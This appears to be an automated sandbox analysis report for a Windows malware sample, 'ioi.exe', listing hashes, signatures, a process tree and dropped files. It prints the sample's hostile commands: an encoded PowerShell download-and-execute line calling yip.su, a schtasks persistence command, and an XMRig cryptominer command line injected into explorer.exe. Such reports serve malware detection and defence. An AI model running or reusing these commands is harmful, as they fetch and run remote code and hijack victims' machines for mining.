Analysis
-
max time kernel
1786s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
02/10/2023, 07:03
Static task
static1
General
-
Target
ioi.exe
-
Size
2.1MB
-
MD5
5e0016fdfe5a3fa39a24dcc2f96fed5c
-
SHA1
9f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f
-
SHA256
e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e
-
SHA512
cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85
-
SSDEEP
49152:tQH0KnAbpxUR52CuztwNd3u9amjsCd2avSoMelNmR3kER1:aBAbpxURj4wNkwmjdiqNmp1
Malware Config
Extracted
https://yip.su/UpdateSecurity
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral1/memory/2636-64-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-65-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-70-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-67-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-75-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-76-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-77-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-91-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-92-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-93-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2636-94-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 38 4224 powershell.exe 40 4224 powershell.exe 71 2792 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4104 services64.exe 4744 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4992 set thread context of 2636 4992 conhost.exe 111 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4316 conhost.exe 4224 powershell.exe 4224 powershell.exe 4992 conhost.exe 4992 conhost.exe 2792 powershell.exe 2792 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 684 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4316 conhost.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeDebugPrivilege 4992 conhost.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeLockMemoryPrivilege 2636 explorer.exe Token: SeLockMemoryPrivilege 2636 explorer.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 4028 wrote to memory of 4316 4028 ioi.exe 88 PID 4028 wrote to memory of 4316 4028 ioi.exe 88 PID 4028 wrote to memory of 4316 4028 ioi.exe 88 PID 4316 wrote to memory of 3740 4316 conhost.exe 91 PID 4316 wrote to memory of 3740 4316 conhost.exe 91 PID 3740 wrote to memory of 4224 3740 cmd.exe 93 PID 3740 wrote to memory of 4224 3740 cmd.exe 93 PID 4316 wrote to memory of 2560 4316 conhost.exe 96 PID 4316 wrote to memory of 2560 4316 conhost.exe 96 PID 2560 wrote to memory of 2780 2560 cmd.exe 97 PID 2560 wrote to memory of 2780 2560 cmd.exe 97 PID 4316 wrote to memory of 3096 4316 conhost.exe 103 PID 4316 wrote to memory of 3096 4316 conhost.exe 103 PID 3096 wrote to memory of 4104 3096 cmd.exe 105 PID 3096 wrote to memory of 4104 3096 cmd.exe 105 PID 4104 wrote to memory of 4992 4104 services64.exe 106 PID 4104 wrote to memory of 4992 4104 services64.exe 106 PID 4104 wrote to memory of 4992 4104 services64.exe 106 PID 4992 wrote to memory of 1220 4992 conhost.exe 107 PID 4992 wrote to memory of 1220 4992 conhost.exe 107 PID 1220 wrote to memory of 2792 1220 cmd.exe 109 PID 1220 wrote to memory of 2792 1220 cmd.exe 109 PID 4992 wrote to memory of 4744 4992 conhost.exe 110 PID 4992 wrote to memory of 4744 4992 conhost.exe 110 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4992 wrote to memory of 2636 4992 conhost.exe 111 PID 4744 wrote to memory of 4488 4744 sihost64.exe 113 PID 4744 wrote to memory of 4488 4744 sihost64.exe 113 PID 4744 wrote to memory of 4488 4744 sihost64.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ioi.exe"C:\Users\Admin\AppData\Local\Temp\ioi.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ioi.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\System32\cmd.exe"cmd" /c powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=3⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"4⤵
- Creates scheduled task(s)
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\cmd.exe"cmd" /c powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=6⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:4488
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=83YrRjXwc5aUdEmkKP1Kzmbkt6yKJno1mLc6bMxsKgswTGc8gKjVyuV2wfbwU7oT4Cb9JhnjMVDBe3Ht9V8151yoMXBAFB8 --pass=x --cpu-max-threads-hint=1006⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5b60ef292780d289f958e98523e2173a9
SHA160e54b94ca6f3489ff96b34c1abd04bc73466cef
SHA25672ce6821405f0f3e75cefa67d8339abd06420adf5a372821c5c49c37e02955e6
SHA5129816269c74e060a4b8494d93060d7111280e626ebaef93c6caa6c54da01aa71b9b545ebc16b3af2812a55c0021f0eceae73ef034f6eb4816bccfcc531a50d60f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
31KB
MD5ba3b89f07c4964516d8ceec5159fd067
SHA1ded85e1ead209a5aa44249eddd264db7642549a1
SHA25613ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e
SHA5123eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9
-
Filesize
31KB
MD5ba3b89f07c4964516d8ceec5159fd067
SHA1ded85e1ead209a5aa44249eddd264db7642549a1
SHA25613ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e
SHA5123eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9
-
Filesize
31KB
MD5ba3b89f07c4964516d8ceec5159fd067
SHA1ded85e1ead209a5aa44249eddd264db7642549a1
SHA25613ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e
SHA5123eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9
-
Filesize
2.1MB
MD55e0016fdfe5a3fa39a24dcc2f96fed5c
SHA19f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f
SHA256e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e
SHA512cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85
-
Filesize
2.1MB
MD55e0016fdfe5a3fa39a24dcc2f96fed5c
SHA19f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f
SHA256e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e
SHA512cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85